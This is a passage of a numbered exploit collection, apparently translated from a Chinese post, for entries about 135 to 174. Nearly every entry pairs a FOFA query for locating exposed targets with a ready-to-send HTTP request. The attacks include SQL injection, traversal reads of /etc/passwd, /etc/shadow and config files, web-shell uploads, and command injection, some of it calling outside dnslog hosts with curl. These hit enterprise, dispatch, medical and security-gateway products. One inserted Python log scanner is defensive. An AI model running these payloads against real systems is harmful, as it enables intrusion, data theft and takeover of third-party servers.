FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


137. Fujian Kirisun (科立讯) communications command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1


138. Fujian Kirisun (科立讯) communications command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


139. Fujian Kirisun (科立讯) communications command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1


140. Fujian Kirisun (科立讯) communications command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1


141. Fujian Kirisun (科立讯) command-and-dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded


dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -


142. CMSV6 vehicle monitoring platform default/weak password
CVE-2024-29666
FOFA:body="/808gps/"
Default credentials: admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the base64-encoded command to execute (aWQ= decodes to id)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip


146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close


148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}


151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
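Added example (mine, not from the original post or from any of the vendors): a Python path normaliser and access-log scanner covering the path-handling bypasses in entries 101 (../ plus a ';' segment), 110 (..;/), 126 (../ traversal), the CVE-2024-27199 paths in entry 132, and entries 149 to 151 (;swagger-ui). It reduces each request path the way a permissive backend resolves it (percent-decode, strip ';' matrix parameters from each segment, resolve . and ..) and flags the request whenever one of those tricks is present, reporting the path the backend actually served. The log lines are constructed, using the request paths from those entries plus two benign requests for contrast.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format. The suspicious paths are
# taken from the entries above; the last two lines are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2024:10:00:01 +0800] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jun/2024:10:00:02 +0800] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 200 87
10.0.0.5 - - [01/Jun/2024:10:00:03 +0800] "GET /static/../../../../../etc/passwd HTTP/1.1" 200 1843
10.0.0.5 - - [01/Jun/2024:10:00:04 +0800] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 9000
10.0.0.5 - - [01/Jun/2024:10:00:05 +0800] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 40
10.0.0.5 - - [01/Jun/2024:10:00:06 +0800] "GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1" 200 300
10.0.0.9 - - [01/Jun/2024:10:00:07 +0800] "GET /static/app.js HTTP/1.1" 200 10240
10.0.0.9 - - [01/Jun/2024:10:00:08 +0800] "GET /api/v1/license/keys-status HTTP/1.1" 401 0
"""

_REQ = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP/')


def normalize_path(raw):
    """Collapse a request path the way a permissive backend resolves it:
    drop the query, percent-decode, strip ';...' matrix parameters from every
    segment, then resolve '.' and '..' without ever climbing above '/'."""
    path = unquote(raw.split("?", 1)[0])
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]          # '..;' -> '..', 'x;swagger-ui' -> 'x'
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    norm = "/" + "/".join(out)
    if path.endswith("/") and out:
        norm += "/"
    return norm


def analyze_path(raw):
    """Return (normalized_path, reasons). reasons == [] for an ordinary path."""
    path = raw.split("?", 1)[0]
    decoded = unquote(path)
    reasons = []
    if decoded != path:
        reasons.append("percent-encoded path")
    segs = decoded.split("/")
    if any(";" in s for s in segs):
        reasons.append("matrix parameter (;)")     # '..;/', ';swagger-ui/'
    if any(s.split(";", 1)[0] == ".." for s in segs):
        reasons.append("dot-dot traversal")
    return normalize_path(raw), reasons


def scan_log(text):
    """Return (raw_path, normalized_path, reasons) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = _REQ.search(line)
        if not m:
            continue
        norm, reasons = analyze_path(m.group(1))
        if reasons:
            hits.append((m.group(1), norm, reasons))
    return hits


if __name__ == "__main__":
    for raw, norm, reasons in scan_log(SAMPLE_LOG):
        print("%-75s -> %-45s %s" % (raw, norm, ", ".join(reasons)))
```

The normalised path is the value to compare against your allow-list of anonymous endpoints: a request whose raw path was outside the authenticated area but whose normalised path lands on /admin/..., /wizard/... or an API route is the bypass the entries above describe, regardless of which product it hits.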


152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster<=7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter (Basic-auth username ';ls;', password doesnotmatter)
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip


153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config


Step 2: have the server copy the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}


Step 3: fetch the temporary file
http://x.x.x.x/file=/tmp/gradio/422ecef943a375e44ed4c28405458cdf49755073/passwd


154. Tianweier (天维尔) fire-rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}


155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--


Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特 CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. INFINITT (英飞达) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓 intelligent parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园 (安校易) smart campus management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web/index.php/admin/viewProjects?sortField=customerName&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. LVS lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. HJSOFT (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close



169. HJSOFT (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close



170. HJSOFT (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close



172. DT HD license-plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive



173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow



174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close



